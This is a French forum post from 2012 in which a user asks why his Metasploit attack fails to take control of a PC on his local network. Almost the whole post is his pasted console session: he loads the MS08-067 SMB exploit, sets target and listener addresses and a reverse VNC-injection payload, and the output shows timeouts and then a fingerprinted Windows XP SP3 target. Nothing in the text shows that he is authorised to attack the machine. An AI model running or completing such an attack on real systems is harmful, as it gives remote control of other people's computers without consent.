essessomo | Date: Mardi, 2012-12-04, 6:44 PM | Message # 1 |
Soldat
Groupe: Users
Messages: 1
Statut: Déconnecté
| voici ce que j'ai avec Metasploit mais je n'arrive pas à prendre le controle du PC (192.168.1.117) je suis sur BACKBOX 3 msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name -- ---- 0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.102 RHOST => 192.168.1.102 msf exploit(ms08_067_netapi) > set LHOST 192.168.1.106 LHOST => 192.168.1.106 msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp payload => windows/vncinject/reverse_tcp msf exploit(ms08_067_netapi) > exploit
Started reverse handler on 192.168.1.106:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.1.102:445). msf exploit(ms08_067_netapi) > set RHOST 192.168.1.102 RHOST => 192.168.1.102 msf exploit(ms08_067_netapi) > exploit
Started reverse handler on 192.168.1.106:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.1.102:445). msf exploit(ms08_067_netapi) > set RHOST 192.168.1.117 RHOST => 192.168.1.117 msf exploit(ms08_067_netapi) > exploit
Started reverse handler on 192.168.1.106:4444 Automatically detecting the target... Fingerprint: Windows XP - Service Pack 3 - lang:French Selected Target: Windows XP SP3 French (NX) Attempting to trigger the vulnerability... msf exploit(ms08_067_netapi) >
|
|
| |